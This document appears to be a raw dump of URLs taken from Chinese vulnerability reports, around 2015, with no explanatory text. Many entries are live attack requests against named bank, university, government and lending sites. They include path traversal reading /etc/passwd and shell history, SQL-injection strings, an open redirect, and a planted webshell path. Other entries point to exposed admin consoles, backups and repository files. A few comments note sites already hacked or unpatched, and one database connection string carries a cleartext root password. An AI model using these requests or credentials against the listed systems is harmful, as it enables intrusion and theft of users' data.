http://att2.citysbs.com/hangzhou/soft/19louV5.5.1.20150811.apk http://fuss10.elemecdn.com/1.txt http://**.**.**.**:7001/console/login/LoginForm.jsp;ADMINCONSOLESESSION=1h92VLZGgGFsKBTPjjDJBRkVDTqltcQKmrJh8JGFqDFpnygMQ1hC!-1011254035 http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://www.circ.gov.cn/tabid/5272/Default.aspx http://cloud.kugou.com/pma_kgweb243/setup/index.php?page=form&formset=Export#tab_Microsoft_Office http://**.**.**.**/ http://**.**.**.**/emlib4/format/release/aspx/book_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/book_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_arts_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_arts_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_disk_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_disk_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_instrumental_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_instrumental_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_languagel_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_languagel_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_ZHAIYAO.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_ZHAIYAO.aspx?RUID= http://g7s.ucenter.huoyunren.com/login.html http://www.dbschenker-atoms.com/index.html http://en.chinacache.com/administrator.tar.gz http://en.chinacache.com/administrator/ http://bbs.zhanzhang.baidu.com/.git/config http://jw.cuc.edu.cn/academic/common/security/login.jsp http://**.**.**.**:8080/oa_server/App_Pages/App_page/News_update.aspx?ID=5 http://**.**.**.**/oa_server/App_Pages/App_page/News_update.aspx?ID=5 http://**.**.**.**:8080/oa_server/App_pages/App_page/FAQDetail_New.aspx?ID=798 http://**.**.**.**/oa_server/App_pages/App_page/FAQDetail_New.aspx?ID=798 http://**.**.**.**:8080/oa_server/App_Pages/App_page/User_managerupdate.aspx?userid=125 http://**.**.**.**/oa_server/App_Pages/App_page/User_managerupdate.aspx?userid=125 http://**.**.**.**:8080/oa_server/Page_App/Service_Page/LM_QuestionSelect.aspx?ID=3406 http://**.**.**.**/oa_server/Page_App/Service_Page/LM_QuestionSelect.aspx?ID=3406 http://www.bjsubway.com/hobbyist/regist.php http://www.bjsubway.com/hobbyist/image/human/20150812161923759.gif/1.php http://**.**.**.**/user/loginform.html http://vip.kangq.com/business.php?action=couponinfo&id=1&k=24* http://vip.kangq.com/business.php?action=couponinfo&id=1* http://sqlmap.org http://yb.**.**.**.**/ http://data.bank.cnfol.com/ index.php/bankdata/product/1/3 Google:inurl:/opac/index.jsp http://wapp.baidu.com/mo/q/searchpage https://github.com/linzhijia/gitskills https://github.com/linzhijia/gitskills/blob/5ec9d74208ff77502e3d3a5fcc5643413bbacb34/ImportExcleUtil/WebRoot/WEB-INF/classes/jdbc.properties jdbc:mysql://dbm.t.com:3306/pl_merchant_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/pl_log_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/pl_product_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/gshop_db?zeroDateTimeBehavior=convertToNull http://ems.nawang.cn/ www.piaozhijia.cn https://github.com/Jihann/Lucene/blob/c50151d43f2b2d81482c21728062222f8d37bfc8/solr-home/solr/core0/conf/data-config.xml jdbc:mysql://61.4.82.138:23306/ticket0326?zeroDateTimeBehavior=convertToNull http://infoaudit.baihe.com/Login.action http://112.122.11.111/ http://112.122.11.111/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://112.122.11.111/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.2cto.com/Article/200609/12101.html http://new-bbs.maxthon.cn/uc_server http://www.fangxinmai.com/error/backOriUrl.htm http://1000y.sdo.com/web3/news_list.aspx?imageField=&Search=1 http://1000y.sdo.com/web3/news_list.aspx?imageField=&Search=1 http://**.**.**.**/Pages/Foreground/MainFrame.aspx?TargetKey=DriverLicenseResubmit# http://**.**.**.**/Pages/Foreground/Common/FeekbackList.aspx http://wooyun.org/bugs/wooyun-2015-0124663 http://**.**.**.**/bugs/wooyun-2015-0133424/trace/e7fb02e2b17b3529b7865d5eb5a62b77 http://**.**.**.**/sfpt/GeneralQuery.jsp?SelectCode=1 http://www.lib.sjtu.edu.cn/ http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://**.**.**.**/phpinfo.php http://**.**.**.**/phpmyadmin/ http://**.**.**.**/u.php/ http://**.**.**.**/grid/portal/base/login.action http://**.**.**.**/bugs/wooyun-2010-0132689 http://**.**.**.**/22100/) https://**.**.**.** http://**.**.**.**/mart/admin/login.asp http://**.**.**.**/mart/syjh/buy_info.asp?prodid=510761%E2%80%98 http://**.**.**.**/news/show?id=20 http://**.**.**.**/comment/getcommenthtml/?psize=3&page=1&targetid=216&sj=1439398698776 http://www.laiqian.com/index.php?r=admin http://vlog.17173.com/space/comment/messagecount/id/40720731*.html https://github.com/kprrr/gitHub-longtai/blob/5ea550476d7b46752025ff19be8b904149bfc9d8/cor_joyea/WebRoot/WEB-INF/classes/jdbc.properties jdbc:mysql://112.124.53.224:3306/msxwdz2?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull http://partner.funshion.com/ http://www.pcjinrong.com/皮城金融主站存在sql注入漏洞,通过注入可获取到一万多名投资者的个人信息。 http://116.228.70.249:8080/accounts/login/ http://mail.yto.net.cn/ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/gxzc//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/xzgn/ss/bdgl.aspx_ http://**.**.**/xzgn/ss/bdgl.aspx_ http://**.**.**/gxzc//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl/xzgn/ss/bdgl.aspx_ http://hui.ztems.com/AppUpgradeAdmin/login/toLogout.do http://**.**.**.**/#/Login http://121.52.235.232:8080/ http://121.52.235.235:8080/ http://**.**.**.**/ztbd.aspx?taskno=005001 http://www.jshbank.com:98/?i=205 http://**.**.**.**/website/RockPlan/TeacherList.aspx?CollegeNo=010 XX:XXXX:XX:XXX%p2p0 m.ifensi.com/index.php?m=fensi&c=stars_wap&a=add_comment http://voice.youyuan.com/ http://shequ.fang.com/i/xiaoquAjax.ashx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_info.aspx http://oa.998.com/login/Login.jsp?logintype=1&gopage=&message=16 http://www.shanlinjinrong.com/ http://channel.wepiao.com/index.php?r=public/register https://**.**.**.**/主站存在sql注入漏洞通过注入漏洞,可以获取6万多用户信息。 application:8000 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageLwSch.aspx?classid=1000 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackage.aspx?dogid=121308 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageLwSch.aspx?classid=1010 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageSch.aspx http://**.**.**.**/edoas2/oa.jsp URL:http://jspx.sicnu.edu.cn/back/login.html http://svt.whut.edu.cn/show.asp?id=797 http://svt.whut.edu.cn/class.asp?id=329 http://**.**.**.**/Apply/SubmitLoginName.aspx http://**.**.**.**/p_zl.asp?id=2 http://**.**.**.**/p_load.asp?id=3 http://**.**.**.**/p_topic.asp?id=5 http://**.**.**.**/product.asp?id=331 http://**.**.**.**/work_detail.asp?id=96 http://**.**.**.**/work_detail3.asp?id=125 http://**.**.**.**/work_detail2.asp?id=68 http://**.**.**.**/Website/ywzn01.jsp?id=900 http://**.**.**.**/xgweb/App_Themes/ http://**.**.**.**/xgweb/WebSite/ http://**.**.**.**/xgweb/Css/ http://**.**.**.**/assess/index.jsp http://ku.games.renren.com/?proid=19 http://localhost:80/univ/xsexam/JSON/AppExamService.ashx?number=20&token=d9f50069-ec9e-451f-8a8d-2405edc82f45&refreshType=new&refreshTime=0&examname= http://www.nuochencaifu.com/ http://www.haihengdai.com/ http://www.888yixinwang.com/ http://www.huifengjinrong.cn/ http://www.hnhsjr.com/ http://42.96.189.69/ http://www.shangced.com/ http://114.215.135.76/ https://121.42.142.169/ http://www.huifengjinrong.cn/测试 http://221.237.153.41:8888/Login.aspx http://pan.baidu.com/s/1kT8aQWn http://pan.baidu.com/s/1ntsxJiL http://**.**.**.**/products_view.asp?id=12114 http://**.**.**.**/admin http://**.**.**.**:8089/user/user_fav.aspx?id=1 http://**.**.**.**:8089/user/book_add_readnums.aspx?bookid=27248 http://**.**.**.**:8089/user/user_remark_show.aspx?id=7 http://www.haodai.com/h5/hdb/index.html http://**.**.**.**/bugs/wooyun-2010-0116322密码还是没改 http://**.**.**.**/bugs/wooyun-2010-0102477还是没有升级strust2 http://**.**.**.**/bugs/wooyun-2010-0102012这个也是 http://**.**.**.**/yh/早就被谁搞过了 http://**.**.**.**/YH/BookList.aspx?con=0000000700030001本来这是个注入,不过被谁删了。 http://portal.crcchem.com http://portal.crcchem.com/tools/SWFUpload/upload.jsp http://**.**.**.** http://app.wzdai.com/app/user/appCZMM.html http://**.**.**.**/resume/resume-show.php?id=8000 http://en.syau.edu.cn/other/n_show.asp?D_id=744 http://en.syau.edu.cn/Academics/index_1.asp?cataid=A01840012 http://coupon.ddmap.com/couponUgc.jsp?mapid=21 http://114.80.178.225/ http://114.80.178.225:7001/console/login/LoginForm.jsp http://61.234.54.111 ftp://61.234.54.111/ ftp://61.234.54.111/kaoshi.rar ftp://61.234.54.111/MapSystem.rar ftp://61.234.54.111/迁移.rar http://moji.sprite.com.cn/pages/index.aspx http://www.szhk.com.cn/admin/index.php?m=Config&a=qijian http://www.szhk.com.cn/index.php?m=Product&a=show&id=104 http://www.kkkdai.com/invest/full_success/a20150600001.html http://shunchangcaifu.com/invest/full_success/a20150600004.html http://wenbangjinrong.com/invest/full_success/a20150500023.html http://www.zhuoxincf.com/invest/full_success/a20150400033.html http://www.lurongdai.com/invest/full_success/a20150800007.html http://www.hengdacaifu.com/invest/full_success/a20150800031.html http://wangdai168.com/invest/full_success/a20150800009.html http://www.xuefudai.com/invest/full_success/a20150800007.html http://www.mingfucaifu.com http://www.donglingdai.com http://www.zndai.com http://www.qduoduo.net http://www.xsbvc.com http://www.mingyedai.com http://yolo100.net http://www.btzhd.com http://ludongchuangtou.com http://xinruncaifu.com http://chengyuecaifu.com http://leyuancaifu.com http://zhuoxincf.com http://www.hengdacaifu.com http://fuhuajinrong.com http://donglingdai.com http://bccht.com http://qinghuacaifu.com http://zhengdaguquan.com http://sdxpct.com http://miaomiaocaifu.com http://www.hongshuncaifu.com http://longmaocaifu.com http://www.91toufang.com http://www.yikuaict.com http://www.jufuyidai.com http://haohaochuangtou.com http://www.153mh.com http://sys-gs.nsmc.edu.cn/yjsjwgl/xsxxwh.do?method=xsxxwh_ck¶m=9267&rand=0.335544942713089&mkdm=N010580 http://sys-gs.nsmc.edu.cn/yjsjwgl/xsxxwh.do?method=xsxxwh_ck¶m=9267 http://**.**.**.**/admin/index.asp http://**.**.**.**/bugs/wooyun-2014-076085 http://**.**.**.**/bugs/wooyun-2015-0108176 http://**.**.**.**/syzx/admin/ https://**.**.**.**/hualiang0537/hlbase/blob/be0cdd552f9d094b2cfabf88db3a24c30ce22e3b/hlbase/src/main/resources/config.properties http://www.heinet.cn/wordpress/ http://www.heinet.cn/zabbix/ http://www.heinet.cn/cacti/ https://**.**.**.**/api4me/horse/blob/56917c49d4eca5bd15644c6f548a3af5744c7732/go/src/mail.go_ http://sist.sysu.edu.cn/main/news/MasterTopTwoNews.aspx?no=104&pId=104 https://github.com/devin1982/dbmonitor/blob/6b322d096c7c8493629af4ca85fd8470d2763231/application/libraries/mailer.php www.x.com.cn https://github.com/seraphlnWu/file_services/blob/c8f99d22a470d74ae8e96d8d45e4d855600bec28/config.py http://**.**.**.**/stm/admin/user/login.action https://**.**.**.**/liuchaox/welab_bi/blob/95e027b34b0b2845c0db3e1bd767d99d1a9631a6/etl/src/kettle/kettle.properties https://**.**.**.**/appweb/newasf/blob/5deca12c9ff743e3544c2cf140b4542c4f003914/APP/Conf/web_config.php http://training.263.net/ http://training.263.net/data/ http://training.263.net/data/backup/ http://training.263.net/data/backup/1343384220.sql http://training.263.net/data/enclosure/temp/CJQ/b681673698.php http://training.263.net/data/enclosure/temp/CJQ/b681673698.php?dir=/ http://27.252.124.89:88/doc/page/main.asp http://27.224.76.230:81/doc/page/main.asp http://27.224.238.55:81/doc/page/main.asp http://27.226.76.101:81/doc/page/main.asp http://27.208.24.227:9000/doc/page/main.asp http://27.214.186.29:88/doc/page/main.asp http://27.214.211.252:88/doc/page/main.asp http://27.208.218.196:88/doc/page/main.asp http://27.213.92.69:88/doc/page/main.asp http://27.223.25.178:88/doc/page/main.asp http://27.219.103.108:82/doc/page/main.asp http://27.215.83.184:82/doc/page/main.asp http://27.216.236.41:81/doc/page/main.asp http://27.210.70.93:81/doc/page/main.asp http://**.**.**.**/logout.jsp https://202.97.177.14 http://211.151.21.215:8085/callback http://wxadmin.chukong-inc.com/login/OAuthcallback.html http://211.151.21.31:8087/callback http://211.151.21.215:8086/callback http://211.151.21.155/callback http://211.151.21.31:8083/callback http://211.151.21.31:8082/callback http://beijing.jingsai.ciwong.com/anquan/ajax/getTotalJoinCount POST:configId=111&organizationID=11000000&areaCode=11000000 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/user/getUser?username=admin http://zwgk.ahedu.gov.cn/XxgkWeb/index.aspx http://**.**.**.**/bugs/wooyun-2010-0104907 http://**.**.**.**/toOrderDetail.htm?userInfoId=1 http://zhuanti.ahedu.gov.cn/jylzfx/more.asp?nClass_Id=1 http://www.gzzoc.com/# http://oa.gzzoc.com http://**.**.**.**/ http://xinfuchuangtou.com/ http://www.nuochencaifu.com/ http://guangzecaifu.com/ http://zhuangyuandai.com/ http://junyuancaifu.com/ http://yongxinct.com/ http://minxinchuangtou.com/ http://haotaiwangdai.com/ http://lwgfjr.com/ http://wx.daling.com:8004/admin http://182.92.187.191/zabbix/dashboard.php http://daichong.qiyun.com/ http://**.**.**.**/manager/login.aspx http://**.**.**.** http://**.**.**.**/editor/editor/filemanager/upload/php/upload.php http://**.**.**.**/upload/File/l.php jdbc:mysql**.**.**.**:3316/oa8000?user=root&password=htoa8000 https://saas.ufida.com.cn http://sysusp.sysu.edu.cn/zsusp/jsp/main/news.jsp?cid=C6B266B628F000013970153018901F83 http://gzycdtb.dayoo.com/index.php?a=doit&c=index&eid=1&m=exam http://**.**.**.**/www.rar,备份时间不详,但数据库管理员口令在备份的配置文件中 http://www.smartapp4u.com/kfz.html IP:140.207.213.17 http://zhidao.baidu.com/link?url=Goo_B_luIu5ZWAjM9j2trO9z89ylEv_WxRs_Xinz7-wxTVWgkpvevLHdDkCqbNnchk_md9mAP1orCFdKJbXopqeCxaHFQx1lWc7hyxIeTOi http://auto.data.longhoo.net/index.php?city=1&bid=172&r=SellerPriceBrand%2FIndex&pid=24 http://open.baidu.com/data/ms/xml/xmlcheck?nav=1 http://zjc.sicnu.edu.cn:80/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx http://**.**.**.**/deptment!showDepartMents.action http://**.**.**.**/wy.jsp http://user.ddmap.com/dcmember/userinfo http://www.dfcv.com.cn/Service.aspx http://22ya.com/aback/login.aspx http://monitor.tianjimedia.com:81/ http://www.ellechina.com/ellechina.tar.gz http://www.hupo.com:80/ www.hupo.com http://px.cdrcb.com/index.jsp http://csjp.lazypea.com/Account/LogOn http://222.73.158.83/phpmyadmin http://huodong.ymatou.com/minisite/jkvote/index.php https://github.com/lixingming/my-crm/blob/20126c42c1bb192a561c0b2e5170139090acdec7/src/main/java/com/b5m/util/mail/SendMailDemo.java application:8000 http://sysusp.sysu.edu.cn:80/zsusp/login.jsp?action=login&password=null&userid=1 http://www.ztemt.com/cn/ http://www.ztemt.com/cn/online.aspx?on=4 http://www.ztemt.com/uploadfiles/main/images/2015/8/20150803183025.aspx http://gps.371gps.com/gps/login http://**.**.**.**/portal/jsp/index.jsp http://**.**.**/jsp/common/download.jspfilepath=/./../.././../../../../../etc/passwd http://**.**.**/jsp/common/download.jsp http://**.**.**/portal/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**//jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**//jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jsp http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://60.10.8.227:89/login.do http://log.7fgame.com/ http://library.sysu.edu.cn/webpage-admin/VerifyImage.action https://github.com/k518/ddd/blob/270d789b4f7fde0025adea88abcccbdb3cd5103b/monitor/test.py http://gdjy.hfut.edu.cn/picNewsInfo.jsp?id=1 http://**.**.**.**/hardware/hardware.rar http://**.**.**.**/Template/Default/Default.zip http://**.**.**.**/ http://**.**.**.**/down.rar Google:inurl:/opac/index.jsp http://**.**.**.**/images/smiley/60.php http://life.sysu.edu.cn/netcooperation/guestbook.php3 http://kms.ys7.com:8081/logPage/?logType=../../../../../../../../../../usr/local/nginx/logs/error.log&executorId=2&appId=app-20140829153405-0000 http://kms.ys7.com:8081/logPage/?logType=../../../../../../../../../../etc/passwd&executorId=2&appId=app-20140829153405-0000 http://**.**.**.**/ http://**.**.**.**/baf/jsp/uiframe/login.xhtml http://**.**.**.**/globeyes/adminjspa/index.jsp http://**.**.**.**/faq.php?id=1 http://**.**.**.**/faq.php?id=1 bdbrowser://snapshot/后面是网址 bdbrowser://snapshot/ http://www.zxssyxx.com/kindeditor/attached/image/20140929/html.html http://10.90.233.19/ http://10.90.233.20/ http://10.90.233.21/ http://10.90.233.22/ http://10.90.233.23/ http://10.90.233.24/ http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.25/ http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.26/ http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.27/ http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.28/ http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.29/ http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.30/ http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.31/ http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.32/ http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.33/ http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.36/ http://10.90.233.37/ http://10.90.233.38/ http://10.90.233.39/ http://10.90.233.40/ http://10.90.233.41/ http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.43/ http://10.90.233.44/ http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.46/ http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.47/ http://10.90.233.48/ http://10.90.233.49/ http://10.90.233.50/ http://10.90.233.51/ http://10.90.233.52/ http://10.90.233.53/ http://10.90.233.54/ http://10.90.233.55/ http://10.90.233.56/ http://10.90.233.57/ http://10.90.233.58/ http://10.90.233.59/ http://10.90.233.60/ http://10.90.233.61/ http://10.90.233.62/ http://10.90.233.63/ http://10.90.233.64/ http://10.90.233.65/ http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.66/ http://10.90.233.67/ http://10.90.233.68/ http://10.90.233.69/ http://10.90.233.70/ http://10.90.233.71/ http://10.90.233.72/ http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.73/ http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.74/ http://10.90.233.75/ http://zhuangyuandai.com/r_pwd_1.jsp http://yunwei.tianjimedia.cn/files/%E7%AE%A1%E7%90%86%E6%96%87%E6%A1%A3/ http://www.whmzj.gov.cn:8080/system/manager/terminalLogin.do http://**.**.**.**/admin/login.asp http://www.flnet.com/Pages/MemberCenter/ForgotPwd.aspx https://221.8.74.29/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 https://pxcz.gov.cn/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 https://218.94.121.236/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 https://60.191.100.179/cgi-pub/exportdata.cgi?type=1&begintime=20130813&endtime=20150814 https://60.191.100.179/cgi-pub/exportdata.cgi?type=2&begintime=20130813&endtime=20150814 https://60.191.100.179/cgi-pub/exportdata.cgi?type=10&begintime=20120813&endtime=20150814 http://www.7caihua.com/Userreg/userorderinfo.htm?newOID=1%27%20or%20%271%27=%271 http://www.7caihua.com/Orders/userorderinfo_cx?OrderID=1%27%20or%20%271%27=%271&CustomerPhone=1%27%20or%20%271%27=%271 http://www.7caihua.com/Orders/userorderpay/OrderID/1222333'%20or%20'1'='1 uems.sysu.edu.cn/jwxt/ http://www.hnhrmy.com:8006/login.aspx http://bdm.ys7.com:89/verifyLogin.do http://**.**.**.**/)下的业务系统 https://github.com/573338063/txglMavenArtifact/blob/722fe7fd94d11a4ebf668061ed68c3220519d72a/txglMavenArtifact/src/main/java/txgl/email/email.properties http://**.**.**.**/WZYW/index.aspx http://hc.brandwisdom.cn/config.php.bak http://m.jbdc.com.cn/ http://price.ziroom.com/?_p=../../../../../../../../etc/passwd%00.html http://**.**.**.**/about.php?id=18注入点 http://**.**.**.**/ http://**.**.**.**/ http://iug.sysu.edu.cn/actices.asp?id=1321 http://**.**.**.**/ModelPages/MarketActivity/MANews.aspx?ColumnCode=%27+OR+%27ns%27%3d%27ns http://www.dangao.com http://**.**.**.**/yuanjian/login.aspx http://xg.hbwj.com.cn http://xg.hbwj.com.cn/Page/ http://xg.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/MasRecGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://www.dangao.com/Userreg/mycang_del?id=84047 http://www.chemao.com.cn:80/ http://radio.3g.cnfol.com/ http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.elitone.cn&www.qq.com www.qq.com就会被拦截 http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.elitone.cn http://nWQxM.elitone.cn http://dourp.sysu.edu.cn/about.aspx?classcode=002001 http://saps.sysu.edu.cn/content.asp?c=68&m=1000&n=3181&todo=showinfo http://sociology.sysu.edu.cn/search.php http://**.**.**.**/aspx/main/myShop.aspx?cityCode=1 http://**.**.**.**:80/ http://www.crsdyy.com/ptsj/login.asp http://**.**.**.**/Question.aspx?qNo=425&act=q http://gm.mm.gtarcade.com/ http://www.hupo.com www.hupo.com http://202.116.102.10/summer/index.php?do=info&id=27 http://www.agent.nissay-greatwall.cn/NISSAY/%28S%285ticp155wr3xoj55is3txdz5%29%29/AgentSalarySearch/ASS0102.aspx?AgentID=ZJ0003788&PerfYM=201504 https://**.**.**.**/cq20110310/adsb/blob/db479f8b3f62cd0dca1f118dbf2790e903719731/Aircraft/config/ReceiveCompressADSBConfig.php http://183.224.74.252/Login.aspx http://**.**.**.**/ http://**.**.**.**/ http://lvzhou.h3c.com/o2o/o2omng/login.xhtml http://www.caitongam.com/yuangong.php http://www.caitongam.com/login.php https://github.com/gaoxw126/ucdev https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/umonitor2/script/deploy/redis-rotate/utils/sender.py https://github.com/gaoxw126/ucdev/search?utf8=%E2%9C%93&q=mysqldb&type=Code https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/chkaccount/check_mul_delete_org/check/get_account_all_step0.sh https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/umonitor2/script/deploy/umonitor2_crontab/cmdb/server_type_inside.sh https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/add_monitor_item/excute_ssh_shell.py http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 www.csairholiday.com/?m=mywap&c=activities&a=my_activities&flag=1 http://financehuawei.hiall.com.cn/openday/admin/ http://**.**.**.**/search.aspx?chid=13&fieldname=title&keyword=%5Bobject%20HTMLInputElement%5D http://**.**.**.**/search.aspx?chid=13&fieldname=title&keyword=%5Bobject%20HTMLInputElement%5D http://**.**.**.** http://cert.chemao.com.cn/.svn/entries www.sttacas.org http://**.**.**.**/subpage.asp?parentclassname= 